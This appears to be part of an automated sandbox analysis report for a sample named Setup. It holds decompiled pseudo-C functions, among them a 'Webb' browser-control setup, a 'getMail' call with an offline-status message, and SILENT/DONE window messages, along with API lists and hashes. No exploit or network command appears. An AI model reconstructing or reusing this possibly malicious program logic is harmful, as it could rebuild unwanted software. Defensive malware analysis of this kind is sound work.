                                                                                                                                                              				_t124 = __esi;
                                                                                                                                                              				_t123 = __edi;
                                                                                                                                                              				_t82 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50673f);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t127 = _t126 - 0x30;
                                                                                                                                                              				_t53 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t53 ^ _t125);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					_v24 = 0;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_v24 = E00405200(_a4 + 4, __eflags, _a8, _v24);
                                                                                                                                                              						__eflags = _v24 - 0xffffffff;
                                                                                                                                                              						if(_v24 == 0xffffffff) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v24;
                                                                                                                                                              						if(_v24 <= 0) {
                                                                                                                                                              							L8:
                                                                                                                                                              							_v24 = E0044F9A4(_a8) + _v24;
                                                                                                                                                              							_t62 = E00451A16(L" :\"",  *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24)) & 0x0000ffff);
                                                                                                                                                              							_t127 = _t127 + 0xc;
                                                                                                                                                              							__eflags = _t62;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								L12:
                                                                                                                                                              								_v24 = E00405230(_a4 + 4, __eflags, L" \"", _v24);
                                                                                                                                                              								__eflags = _v24 - 0xffffffff;
                                                                                                                                                              								if(_v24 == 0xffffffff) {
                                                                                                                                                              									L14:
                                                                                                                                                              									_t65 = 0;
                                                                                                                                                              									L21:
                                                                                                                                                              									 *[fs:0x0] = _v16;
                                                                                                                                                              									return _t65;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = ( *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24)) & 0x0000ffff) - 0x3a;
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									_v24 = E00405230(_a4 + 4, __eflags, " ", _v24 + 1);
                                                                                                                                                              									__eflags = _v24 - 0xffffffff;
                                                                                                                                                              									if(_v24 == 0xffffffff) {
                                                                                                                                                              										L17:
                                                                                                                                                              										_t65 = 0;
                                                                                                                                                              										goto L21;
                                                                                                                                                              									}
                                                                                                                                                              									_t70 = E004051D0(_t82, _a4 + 4, _t123, _t124, _v24);
                                                                                                                                                              									__eflags = ( *_t70 & 0x0000ffff) - 0x22;
                                                                                                                                                              									if(( *_t70 & 0x0000ffff) == 0x22) {
                                                                                                                                                              										_v24 = _v24 + 1;
                                                                                                                                                              										_v20 = E004468C0(_a4 + 4, 0x22, _v24);
                                                                                                                                                              										__eflags = _v20 - 0xffffffff;
                                                                                                                                                              										if(_v20 != 0xffffffff) {
                                                                                                                                                              											__eflags = _a4 + 4;
                                                                                                                                                              											_v60 = E00405260(_a4 + 4,  &_v52, _v24, _v20 - _v24);
                                                                                                                                                              											_v64 = _v60;
                                                                                                                                                              											_v8 = 0;
                                                                                                                                                              											E00409880(_a12, __eflags, _v64);
                                                                                                                                                              											_v8 = 0xffffffff;
                                                                                                                                                              											E004178C0( &_v52);
                                                                                                                                                              											_t65 = 1;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t65 = 0;
                                                                                                                                                              										}
                                                                                                                                                              										goto L21;
                                                                                                                                                              									}
                                                                                                                                                              									goto L17;
                                                                                                                                                              								}
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              							L11:
                                                                                                                                                              							__eflags = 1;
                                                                                                                                                              							if(1 != 0) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							goto L12;
                                                                                                                                                              						}
                                                                                                                                                              						_t81 = E00451A16(L" {\",",  *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24 - 1)) & 0x0000ffff);
                                                                                                                                                              						_t127 = _t127 + 8;
                                                                                                                                                              						__eflags = _t81;
                                                                                                                                                              						if(_t81 != 0) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						}
                                                                                                                                                              						_v24 = _v24 + 1;
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              					_t65 = 0;
                                                                                                                                                              					goto L21;
                                                                                                                                                              				}
                                                                                                                                                              				_t65 = 0;
                                                                                                                                                              				goto L21;
                                                                                                                                                              			}























                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :"$ {",
                                                                                                                                                              • API String ID: 0-2208196758
                                                                                                                                                              • Opcode ID: f031f3fa4ac938f2b817baabfdce8d8ae56471382f4ec89a465f4afe541d00d3
                                                                                                                                                              • Instruction ID: 4a0d8f4aa3ebc0104b72774a5acafe2e7dd2801f8f0091a06b8487880b9cf539
                                                                                                                                                              • Opcode Fuzzy Hash: f031f3fa4ac938f2b817baabfdce8d8ae56471382f4ec89a465f4afe541d00d3
                                                                                                                                                              • Instruction Fuzzy Hash: D551307190010DAFDB04DF98C955BBF7775EF84318F20422EE616BB382D6789A05CB6A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00405E90(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				intOrPtr* _v56;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				intOrPtr _t83;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                              				signed int _t133;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x518428);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t95);
                                                                                                                                                              				_t62 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t62 ^ _t133);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t134 - 0x24;
                                                                                                                                                              				_v56 = _t95;
                                                                                                                                                              				_v24 = 0xffffffff;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if( *((intOrPtr*)(_v56 + 0xa4)) == 0) {
                                                                                                                                                              					if(IsWindow(_a4) != 0) {
                                                                                                                                                              						 *((intOrPtr*)(_v56 + 0x84)) = _a4;
                                                                                                                                                              						_v24 = 1;
                                                                                                                                                              						_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x70))))(_v56, _v56 + 0xc8);
                                                                                                                                                              						if(_v28 == 0) {
                                                                                                                                                              							_v24 = 3;
                                                                                                                                                              							E00414C90();
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x6c))))(_v56,  &_v36);
                                                                                                                                                              							_v28 = E00409BF0(_a4, 0xffffffff,  &_v32, E0041D530(_v56 + 0xc8), _v36, 0);
                                                                                                                                                              							if(_v28 == 0) {
                                                                                                                                                              								_v24 = 5;
                                                                                                                                                              								_v28 = E00401580(E0041D530( &_v32), _a8);
                                                                                                                                                              								if(_v28 != 0) {
                                                                                                                                                              									_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x60))))(_v56, 5, L"Webb::failed to start sink");
                                                                                                                                                              									_push(_v28);
                                                                                                                                                              									_push(L"Webb::failed to start sink(%x)");
                                                                                                                                                              									E004CC5C0(_t86);
                                                                                                                                                              								}
                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x74))))(_v56, E0041D530( &_v32));
                                                                                                                                                              								_v48 = 0;
                                                                                                                                                              								_v8 = 0;
                                                                                                                                                              								E0040D320();
                                                                                                                                                              								_t83 = _v48;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x60))))(_v56, 4, L"Webb:: create inner control failed");
                                                                                                                                                              								_push(_v28);
                                                                                                                                                              								_push(L"Webb:: create inner control faile (%x)");
                                                                                                                                                              								E004CC5C0(_v28);
                                                                                                                                                              								_v44 = _v28;
                                                                                                                                                              								_v8 = 0;
                                                                                                                                                              								E0040D320();
                                                                                                                                                              								_t83 = _v44;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_t83 = _v28;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t83 = 0x80070057;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t83 = 0x80004004;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t83;
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Webb::failed to start sink, xrefs: 00405FF1
                                                                                                                                                              • Webb::failed to start sink(%x), xrefs: 0040600A
                                                                                                                                                              • Webb:: create inner control failed, xrefs: 00405F8C
                                                                                                                                                              • Webb:: create inner control faile (%x), xrefs: 00405FA5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window
                                                                                                                                                              • String ID: Webb:: create inner control faile (%x)$Webb:: create inner control failed$Webb::failed to start sink$Webb::failed to start sink(%x)
                                                                                                                                                              • API String ID: 2353593579-1275530296
                                                                                                                                                              • Opcode ID: 474e3da82e0cc466d048fbfad2a84c99366ed9459d03b0eb0226204c4c524e49
                                                                                                                                                              • Instruction ID: 0902af705790d79e5c6307455ef4b9087a03f906983d013e0f34a35d235ffbcd
                                                                                                                                                              • Opcode Fuzzy Hash: 474e3da82e0cc466d048fbfad2a84c99366ed9459d03b0eb0226204c4c524e49
                                                                                                                                                              • Instruction Fuzzy Hash: AC513A71A01509AFDB04EF98D981FEEBBB5FF48304F204169F506A7290D738AE45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004F3180(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				signed int _v64;
                                                                                                                                                              				signed int _v72;
                                                                                                                                                              				char _v73;
                                                                                                                                                              				char _v108;
                                                                                                                                                              				char _v109;
                                                                                                                                                              				intOrPtr _v116;
                                                                                                                                                              				signed int _v120;
                                                                                                                                                              				char _v152;
                                                                                                                                                              				char _v153;
                                                                                                                                                              				char _v200;
                                                                                                                                                              				intOrPtr _v204;
                                                                                                                                                              				intOrPtr* _v208;
                                                                                                                                                              				signed int _v212;
                                                                                                                                                              				signed int _v216;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				signed char _t69;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				intOrPtr _t84;
                                                                                                                                                              				void* _t101;
                                                                                                                                                              				void* _t138;
                                                                                                                                                              				void* _t139;
                                                                                                                                                              				signed int _t140;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_t147 = __fp0;
                                                                                                                                                              				_t139 = __esi;
                                                                                                                                                              				_t138 = __edi;
                                                                                                                                                              				_t101 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50f734);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t62 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t63 = _t62 ^ _t140;
                                                                                                                                                              				_v20 = _t63;
                                                                                                                                                              				_push(_t63);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v208 = __ecx;
                                                                                                                                                              				E004175C0(E00434050( &_v73));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t144 = _a12;
                                                                                                                                                              				if(_a12 == 0) {
                                                                                                                                                              					E00416600( &_v52,  &_v52, L"{offline:\"%d\"}", _a8);
                                                                                                                                                              				} else {
                                                                                                                                                              					E00417910(_a12, E00434050( &_v109));
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004181D0( &_v52,  &_v108);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					__imp__#6(_a12);
                                                                                                                                                              				}
                                                                                                                                                              				_t69 = E004F2770(_t101, _v208, _t138, _t139, _t144, _t147);
                                                                                                                                                              				_t135 = _t69 & 0x000000ff;
                                                                                                                                                              				if((_t69 & 0x000000ff) != 0) {
                                                                                                                                                              					_t70 = E004F2350(_v208);
                                                                                                                                                              					__eflags = _t70;
                                                                                                                                                              					if(_t70 < 0) {
                                                                                                                                                              						E004F2370(_t101, _v208, _t138, _t139);
                                                                                                                                                              					}
                                                                                                                                                              					E00417910(L"ML", E00434050( &_v153));
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					_v212 = E00501530(E00501CE0(), __eflags,  &_v200,  &_v152);
                                                                                                                                                              					_t135 = _v212;
                                                                                                                                                              					_v216 = _v212;
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					_v120 = E00404760(_v216, 0);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004224B0();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					__eflags = _v120;
                                                                                                                                                              					if(_v120 != 0) {
                                                                                                                                                              						E00416A10( &_v72);
                                                                                                                                                              						_v8 = 4;
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_v208 + 0x80))))(_v208, L"getMail", 0, 0,  &_v72);
                                                                                                                                                              						_t135 = _v72 & 0x0000ffff;
                                                                                                                                                              						__eflags = (_v72 & 0x0000ffff) - 8;
                                                                                                                                                              						if((_v72 & 0x0000ffff) == 8) {
                                                                                                                                                              							__eflags =  *_v64 & 0x0000ffff;
                                                                                                                                                              							if(( *_v64 & 0x0000ffff) != 0) {
                                                                                                                                                              								_t135 = _v64;
                                                                                                                                                              								E004048A0(E00404820(), _v64);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E00417430( &_v72);
                                                                                                                                                              					}
                                                                                                                                                              					E004E6990(E004049B0());
                                                                                                                                                              					E004F30E0(_t101, _v208, _t138, _t139, __eflags, _t147,  &_v52);
                                                                                                                                                              					_v204 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_t84 = _v204;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v116 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_t84 = _v116;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t84, _t101, _v20 ^ _t140, _t135, _t138, _t139);
                                                                                                                                                              			}































                                                                                                                                                              0x004f3355
                                                                                                                                                              0x004f3364
                                                                                                                                                              0x004f3369
                                                                                                                                                              0x004f3373
                                                                                                                                                              0x004f337d
                                                                                                                                                              0x004f3382
                                                                                                                                                              0x004f3233
                                                                                                                                                              0x004f3233
                                                                                                                                                              0x004f323a
                                                                                                                                                              0x004f3244
                                                                                                                                                              0x004f3249
                                                                                                                                                              0x004f3249
                                                                                                                                                              0x004f338b
                                                                                                                                                              0x004f33a0

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$FreeString
                                                                                                                                                              • String ID: getMail${offline:"%d"}
                                                                                                                                                              • API String ID: 4250984490-2278394474
                                                                                                                                                              • Opcode ID: 94f43a87b8817557d57f875c6742cae7e3f05bf0f175234f9bbc4f0b827b4953
                                                                                                                                                              • Instruction ID: 0b00b0d10cad26ea970f4bd532ae3d9bcf03c87f8020568c9a7219c3257146db
                                                                                                                                                              • Opcode Fuzzy Hash: 94f43a87b8817557d57f875c6742cae7e3f05bf0f175234f9bbc4f0b827b4953
                                                                                                                                                              • Instruction Fuzzy Hash: 7E515A709012189BDB18EFA5DD51FEEB7B4BF50304F1041AEE509A72D1DB786E44CBA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004F0CB0(void* __ebx, struct HWND__* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v53;
                                                                                                                                                              				char _v88;
                                                                                                                                                              				char _v89;
                                                                                                                                                              				struct HWND__* _v96;
                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                              				signed int _t32;
                                                                                                                                                              				int _t36;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x507d0c);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t32 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t32 ^ _t54);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				_v100 = _a4;
                                                                                                                                                              				_v100 = _v100 + 4;
                                                                                                                                                              				if(_v100 > 0x68) {
                                                                                                                                                              					L6:
                                                                                                                                                              					_t36 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t9 = _v100 + 0x4f0e10; // 0xcccccc03
                                                                                                                                                              					switch( *((intOrPtr*)(( *_t9 & 0x000000ff) * 4 +  &M004F0DFC))) {
                                                                                                                                                              						case 0:
                                                                                                                                                              							__ecx =  &_v89;
                                                                                                                                                              							__eax = E00434050( &_v89);
                                                                                                                                                              							__ecx =  &_v88;
                                                                                                                                                              							__eax = E00417910(L"SILENT", __eax);
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              							__edx =  &_v88;
                                                                                                                                                              							__ecx = 0x5bde88;
                                                                                                                                                              							__eax = E004181D0(0x5bde88,  &_v88);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							__ecx =  &_v88;
                                                                                                                                                              							__eax = E004176E0();
                                                                                                                                                              							__eax =  *0x5bdd34; // 0x80078
                                                                                                                                                              							__eax = PostMessageW(__eax, 0x402, 1, 0);
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 1:
                                                                                                                                                              							__ecx = _v96;
                                                                                                                                                              							__edx =  *((intOrPtr*)(__ecx + 0x12c));
                                                                                                                                                              							__edx =  *((intOrPtr*)(__ecx + 0x12c)) - 1;
                                                                                                                                                              							__ecx = _v96;
                                                                                                                                                              							__eax = E004F0B90(__ebx, _v96, __edx, __edi, __esi, __edx);
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 2:
                                                                                                                                                              							E004161E0(E00416210(_v96 + 0x84,  &_v20), 0x10, _a4, 0);
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 3:
                                                                                                                                                              							__ecx =  &_v53;
                                                                                                                                                              							__eax = E00434050( &_v53);
                                                                                                                                                              							__ecx =  &_v52;
                                                                                                                                                              							__eax = E00417910(L"DONE", __eax);
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							__eax =  &_v52;
                                                                                                                                                              							__ecx = 0x5bde88;
                                                                                                                                                              							__eax = E004181D0(0x5bde88,  &_v52);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							__ecx =  &_v52;
                                                                                                                                                              							__eax = E004176E0();
                                                                                                                                                              							__ecx =  *0x5bdd34; // 0x80078
                                                                                                                                                              							__eax = PostMessageW(__ecx, 0x406, 1, 0);
                                                                                                                                                              							L7:
                                                                                                                                                              							_t36 = 1;
                                                                                                                                                              							goto L8;
                                                                                                                                                              						case 4:
                                                                                                                                                              							goto L6;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L8:
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t36;
                                                                                                                                                              			}















                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0cfb
                                                                                                                                                              0x004f0de8
                                                                                                                                                              0x004f0deb
                                                                                                                                                              0x004f0df6

                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(00080078,00000406,00000001,00000000), ref: 004F0D72
                                                                                                                                                              • PostMessageW.USER32(00080078,00000402,00000001,00000000), ref: 004F0DC3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID: DONE$SILENT$h
                                                                                                                                                              • API String ID: 410705778-1397473427
                                                                                                                                                              • Opcode ID: bd0b44ee22a918ce0de0a3c68db5ef7cb4e7a728f43999ecf7e7c2e164909423
                                                                                                                                                              • Instruction ID: b521facae403294bf25b0b7f8936e62260cfcf800c29164a3d36239f9ae750ec
                                                                                                                                                              • Opcode Fuzzy Hash: bd0b44ee22a918ce0de0a3c68db5ef7cb4e7a728f43999ecf7e7c2e164909423
                                                                                                                                                              • Instruction Fuzzy Hash: AF318C70A14208ABDB08DFD4DC56BEEB775FB84710F10862EE6126B2C2DB796905CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E004CAE60(void* __ebx, struct HINSTANCE__** __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				short _v44;
                                                                                                                                                              				int _v48;
                                                                                                                                                              				struct HINSTANCE__** _v52;
                                                                                                                                                              				signed int _t15;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				signed int _t45;
                                                                                                                                                              
                                                                                                                                                              				_t44 = __esi;
                                                                                                                                                              				_t43 = __edi;
                                                                                                                                                              				_t29 = __ebx;
                                                                                                                                                              				_t15 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v12 = _t15 ^ _t45;
                                                                                                                                                              				_v52 = __ecx;
                                                                                                                                                              				if(E00430C20(_v52) == 0) {
                                                                                                                                                              					_t18 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					wsprintfW( &_v44, L"icon%d", _a4);
                                                                                                                                                              					asm("sbb edx, edx");
                                                                                                                                                              					_v48 = GetSystemMetrics(( ~_a8 & 0xffffffda) + 0x31);
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_v8 = GetSystemMetrics(( ~_a8 & 0xffffffda) + 0x32);
                                                                                                                                                              					_t37 =  *_v52;
                                                                                                                                                              					_t18 = LoadImageW( *_v52,  &_v44, 1, _v48, _v8, 0);
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_t18, _t29, _v12 ^ _t45, _t37, _t43, _t44);
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$ImageLoadwsprintf
                                                                                                                                                              • String ID: icon%d
                                                                                                                                                              • API String ID: 3909377768-3280701045
                                                                                                                                                              • Opcode ID: 2d9cc9c1688a22febf2ed6e05615a5419e729802003467ace3d98fd594a0b198
                                                                                                                                                              • Instruction ID: de662ed2c80c83afdf942a6c1c8f2b8e47cdcb8d8a5d1dcf82a73053b9f924e1
                                                                                                                                                              • Opcode Fuzzy Hash: 2d9cc9c1688a22febf2ed6e05615a5419e729802003467ace3d98fd594a0b198
                                                                                                                                                              • Instruction Fuzzy Hash: 29115E75A10108AFDB44DFB8DC81EEEB7BAEB99710F00C629F815D7290E7349904DB94
